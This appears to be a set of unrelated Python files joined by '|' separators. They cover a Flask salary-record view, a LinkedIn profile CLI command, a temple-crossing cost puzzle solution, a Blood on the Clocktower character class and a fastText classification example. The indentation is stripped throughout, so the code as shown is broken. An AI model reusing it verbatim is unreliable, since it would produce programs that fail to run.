def __str__(self):
return f'{self.city_hotelka},{self.prof_hotelka},{self.salary_from_hotelka},{self.salary_to_hotelka}'
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
HH_hotelka_1 = HH_hotelka(city_hotelka, prof_hotelka, salary_from_hotelka, salary_to_hotelka)
session.add(HH_hotelka_1)
session.commit()
return render_template('hands_to_db_rec.html', data=data)
if __name__ == "__main__":
app.run(debug=True)
|
import json
import linkedin.commands.command as command
import linkedin.utils.config as config
import logging
from urllib import request
logger = logging.getLogger(__name__)
class HelpCommand(command.BaseCommand):
def execute(self, args):
print("usage: linkedin me")
class MeCommand(command.BaseCommand):
def execute(self, args):
url = "https://api.linkedin.com/v2/me"
req = request.Request(url, headers={'Authorization': 'Bearer ' + config.getConfig().CONFIG['access_token']})
response = request.urlopen(req)
user = json.loads(response.read())
print("ID: " + user["id"],)
print("First Name: " + user['localizedFirstName'])
print("Last Name: " + user['localizedLastName'])
|
"""Program takes 3 variables as inputs I.E. Number of test cases Number of People and The cost array in the given order respectively"""
no_of_test_cases=int(input())
for _ in range(no_of_test_cases):
no_of_people=int(input())
cost_list=list(map(int,input().split()))
cost_list.sort()
cost=0
while(no_of_people>3):
""" As seen in the sample test cases, either the lowest costing person can make 2 round trips with the highest costing people
or the 2 lowest costing people can go first followed by the lowest costing person returning and then the 2 highest costing person going
to the temple and the second lowest person returning, whichever is the lowest among these 2(As seen in 1st and 4th test case)"""
#2*cost_list[0]+cost_list[no_of_people-1]+cost_list[no_of_people-2] for when the lowest cost returns twice
#cost_list[0]+2*cost_list[1]+cost_list[no_of_people-1] for when the 2 of the lowest go first and then each one retuns starting with the lowest
#this can also be done by checking if the lowest cost+ second highest cost is greater or lesser than 2 times 2nd lowest cost
cost+=min((2*cost_list[0]+cost_list[no_of_people-1]+cost_list[no_of_people-2]),(cost_list[0]+2*cost_list[1]+cost_list[no_of_people-1]))
"""Loop will run until there are less than 3 people left to go to the temple, reducing the length of the list by 2 each time the above method
is repeated"""
no_of_people-=2
if(no_of_people==3):
        # the cost for 3 people: the highest and lowest go, the lowest returns, then the second-highest and lowest go; i.e. the sum of their costs
cost+=cost_list[0]+cost_list[1]+cost_list[2]
elif(no_of_people==2):
#whichever of the two is higher should be added to the cost
cost+=cost_list[1]
else:
cost+=cost_list[0]
print(cost)
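# A quick hand-check of the two strategies on the classic instance with costs
# [1, 2, 5, 8] (hypothetical example, not read from the input above):
_demo_costs = sorted([1, 2, 5, 8])
_strategy_a = 2*_demo_costs[0] + _demo_costs[-1] + _demo_costs[-2]  # cheapest person shuttles twice: 15
_strategy_b = _demo_costs[0] + 2*_demo_costs[1] + _demo_costs[-1]   # two cheapest cross first: 13
assert min(_strategy_a, _strategy_b) + _demo_costs[1] == 15          # matches what the loop above would print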
|
"""Contains the Courtier Character class"""
import json
from botc import Character, Townsfolk
from ._utils import BadMoonRising, BMRRole
with open('botc/gamemodes/badmoonrising/character_text.json') as json_file:
character_text = json.load(json_file)[BMRRole.courtier.value.lower()]
class Courtier(Townsfolk, BadMoonRising, Character):
"""Courtier: Once per game, at night, choose a character: they are drunk for 3 nights & 3 days.
"""
def __init__(self):
Character.__init__(self)
BadMoonRising.__init__(self)
Townsfolk.__init__(self)
self._desc_string = character_text["description"]
self._examp_string = character_text["examples"]
self._instr_string = character_text["instruction"]
self._lore_string = character_text["lore"]
self._brief_string = character_text["brief"]
self._action = character_text["action"]
self._art_link = "https://bloodontheclocktower.com/wiki/images/7/7d/Courtier_Token.png"
self._art_link_cropped = "https://imgur.com/c1wt8jB.png"
self._wiki_link = "https://bloodontheclocktower.com/wiki/Courtier"
self._role_enum = BMRRole.courtier
self._emoji = "<:bmrcourtier:781151556128342058>"
|
import fasttext as ft
from os import path
# First download dbpedia.train using https://github.com/facebookresearch/fastText/blob/master/classification-example.sh
# in test/ and move it to the example directory
current_dir = path.dirname(__file__)
input_file = path.join(current_dir, 'dbpedia.train')
output = '/tmp/classifier'
test_file = '../test/classifier_test.txt'
# set params
dim=10
lr=0.005
epoch=1
min_count=1
word_ngrams=3
bucket=2000000
thread=4
silent=1
label_prefix='__label__'
# Train the classifier
classifier = ft.supervised(input_file, output, dim=dim, lr=lr, epoch=epoch,
min_count=min_count, word_ngrams=word_ngrams, bucket=bucket,
thread=thread, silent=silent, label_prefix=label_prefix)
# Test the classifier
result = classifier.test(test_file)
print('P@1:', result.precision)
print('R@1:', result.recall)
print('Number of examples:', result.nexamples)
# Predict some text
# (Example text is from dbpedia.train)
texts = ['birchas chaim , yeshiva birchas chaim is a orthodox jewish mesivta \
high school in lakewood township new jersey . it was founded by rabbi \
shmuel zalmen stein in 2001 after his father rabbi chaim stein asked \
him to open a branch of telshe yeshiva in lakewood . as of the 2009-10 \
school year the school had an enrollment of 76 students and 6 . 6 \
classroom teachers ( on a fte basis ) for a student–teacher ratio of \
11 . 5 1 .']
labels = classifier.predict(texts)
print(labels)
|